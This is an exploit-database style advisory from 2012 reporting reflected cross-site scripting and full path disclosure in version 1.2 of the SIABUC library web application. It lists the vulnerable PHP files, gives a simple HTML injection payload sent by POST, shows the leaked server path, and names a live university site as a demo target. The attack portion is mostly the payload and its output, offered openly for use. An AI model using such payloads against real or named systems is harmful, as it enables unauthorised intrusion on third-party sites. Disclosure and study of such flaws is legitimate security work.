# Author: Mazt0r
# Exploit Title: XSS & Full Path Disclosure SIABUC
# Date: 24/02/2012
# software: SIABUC
# link: http://siabuc.ucol.mx/
# Version: Version 1.2 [Other versions "NO TESTED"]
# Category: webapps Library
# Tested on: Linux
Demo:http://www.cidcacs.iis.ucr.ac.cr/
----------------
Vulnerable
----------------
/reservacion/index.php
/reservacion/include/buscar.php
Exploit:
======================
http://localhost/reservacion/index.php
POST: XSS
Result: /reservacion/include/buscar.php
======================
Example:
======================
|---------------------|
|" > < h1 > A < / h1 >|
|---------------------|
\
- Execution Code
Result FPD: Notice: Trying to get property of non-object in C:\ABCSIS\Reservacion\include\buscarws.php on line ***
"© Derechos reservados 2010, Universidad de Colima. Página desarrollada por el departamento de SIABUC"
----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------